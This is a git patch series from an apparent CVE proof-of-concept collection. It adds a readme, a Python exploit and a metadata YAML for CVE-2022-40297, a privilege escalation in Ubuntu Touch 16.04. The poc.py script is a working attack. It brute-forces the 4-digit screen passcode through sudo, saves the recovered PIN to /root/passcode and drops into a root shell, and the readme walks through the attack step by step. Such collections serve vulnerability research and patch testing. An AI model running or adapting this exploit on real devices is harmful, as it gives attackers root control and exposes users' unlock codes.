From 65f6447741c21d6c19bde04c4e3dbaac2c34e750 Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 07:30:18 +0000 Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-40297?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-40297/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-40297/.keep b/cve/linux-kernel/2022/CVE-2022-40297/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c4f1bcd052ee64aa0869401f1b4894b7ea0345b7 Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 07:42:15 +0000 Subject: [PATCH 2/7] rename cve/linux-kernel/2022/CVE-2022-40297/.keep to cve/linux-kernel/2022/CVE-2022-40297/readme.md. Signed-off-by: baimafeima123 --- cve/linux-kernel/2022/CVE-2022-40297/.keep | 0 .../2022/CVE-2022-40297/readme.md | 20 +++++++++++++++++++ 2 files changed, 20 insertions(+) delete mode 100644 cve/linux-kernel/2022/CVE-2022-40297/.keep create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/readme.md diff --git a/cve/linux-kernel/2022/CVE-2022-40297/.keep b/cve/linux-kernel/2022/CVE-2022-40297/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2022/CVE-2022-40297/readme.md b/cve/linux-kernel/2022/CVE-2022-40297/readme.md new file mode 100644 index 00000000..877697f8 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-40297/readme.md @@ -0,0 +1,20 @@ +From github: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc + +[UPDATE 09.09.2022] I got new CVE for this vulnerability: [CVE-2022-40297](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40297). + +## Proof of Concept: Privilege escalation in Ubuntu Touch 16.04 - by Passcode Bruteforce + +Ubuntu Touch allows you to "protect" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then +becomes a password that we can use with the sudo command and gain root privileges. + +This means that a malicious application can do us double harm: +1. Easily escalate privileges and take control of the device. +2. It can pass the screen unlock passcode to a third party. + +## How does my Proof of Concept work? + +1. We run poc.py as a regular user. +2. App is doing bruteforce attack on password. No rate limit in system! +3. Passcode to unlock the screen = password for sudo su to obtain root. +4. After 1-2 minutes we have passcode on the screen, which we also save to the file /root/passcode as evidence of system compromise. + -- Gitee From a4bab42a541e896601372b4bf4e8eeee0d0171a6 Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 07:44:22 +0000 Subject: [PATCH 3/7] add cve/linux-kernel/2022/CVE-2022-40297/poc.py. Signed-off-by: baimafeima123 --- cve/linux-kernel/2022/CVE-2022-40297/poc.py | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/poc.py diff --git a/cve/linux-kernel/2022/CVE-2022-40297/poc.py b/cve/linux-kernel/2022/CVE-2022-40297/poc.py new file mode 100644 index 00000000..0e468c2b --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-40297/poc.py @@ -0,0 +1,29 @@ +""" +Visit: +https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc +Run as REGULAR user in Ubuntu Touch 16.04 with 4-digit passcode. +""" + +import os +import sys + +x = 1 +while x <= 9999: + password = (str(x).zfill(4)) + result = os.system("echo {} | sudo -Si".format(password.strip())) + if result == "0" or result == 0: + print("\n\n\n===> PIN is: " + password + "\n\n\n") + print("whoami result:") + os.system("echo \"whoami; echo " + password + " > /root/passcode; echo \"We saved passcode to the file /root/passcode:\"; cat /root/passcode\" | sudo su"); + print() + os.system("sudo su"); + exit(0) + x = x + 1 + +""" +What happened? +1. We found the 4-digit passcode via burtefore. +2. We obtained root. +3. We saved the content of 4-digit passcode in /root/passcode +4. We displayed the content of /root/passcode +""" \ No newline at end of file -- Gitee From 713e1abf7ced89ea02151216f061adf7fe61eb28 Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 07:48:35 +0000 Subject: [PATCH 4/7] add cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml. Signed-off-by: baimafeima123 --- .../2022/yaml/CVE-2022-40297.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml new file mode 100644 index 00000000..45645404 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-40297 +source: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc +info: + name: 漏洞软件包简介 + severity: 漏洞危害 + description: | + 漏洞描述 + scope-of-influence: + 漏洞影响范围 + reference: + - 漏洞相关链接 + classification: + cvss-metrics: CVSS:3.1 + cvss-score: 漏洞评分 + cve-id: CVE-2022-40297 + cwe-id: + cnvd-id: + kve-id: + tags: 漏洞标签 \ No newline at end of file -- Gitee From 0d9c15dfa405f68a9802f6584a9f247e4e72634c Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 08:14:03 +0000 Subject: [PATCH 5/7] update cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml. Signed-off-by: baimafeima123 --- .../2022/yaml/CVE-2022-40297.yaml | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml index 45645404..6064528e 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml @@ -1,19 +1,19 @@ id: CVE-2022-40297 source: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc info: - name: 漏洞软件包简介 - severity: 漏洞危害 + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high description: | - 漏洞描述 + 该漏洞可通过 Sudo 对 privileged shell 使用屏幕解锁密码。这个密码只有四位数,远远低于用户帐户密码的典型长度/复杂度。使得通过简单的穷举即可获得密码,从而轻松提权控制设备或者将屏幕解锁密码传递给第三方。 scope-of-influence: - 漏洞影响范围 + UBports Ubuntu Touch 16.04 reference: - - 漏洞相关链接 + - https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40297 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40297 + - https://cve.report/CVE-2022-40297.pdf classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 cve-id: CVE-2022-40297 - cwe-id: - cnvd-id: - kve-id: - tags: 漏洞标签 \ No newline at end of file + tags: Privilege escalation, cve2022 \ No newline at end of file -- Gitee From 26d89d3a766cc7e1ee1b06600ccd369b134292a2 Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 08:16:19 +0000 Subject: [PATCH 6/7] update cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml. Signed-off-by: baimafeima123 --- cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml index 6064528e..46ad8180 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml @@ -16,4 +16,4 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-40297 - tags: Privilege escalation, cve2022 \ No newline at end of file + tags: Privilege escalation, Mobile-hacking, cve2022 \ No newline at end of file -- Gitee From e8b18b03242c7b659c934690432e5bd3f7119e2d Mon Sep 17 00:00:00 2001 From: baimafeima123 Date: Mon, 13 Mar 2023 08:17:43 +0000 Subject: [PATCH 7/7] update other_list.yaml. Signed-off-by: baimafeima123 --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index 390c34e0..b474139d 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -7,6 +7,7 @@ cve: - CVE-2022-1015 - CVE-2022-2602 - CVE-2022-2586 + - CVE-2022-40297 polkit: - CVE-2021-3560 redis: -- Gitee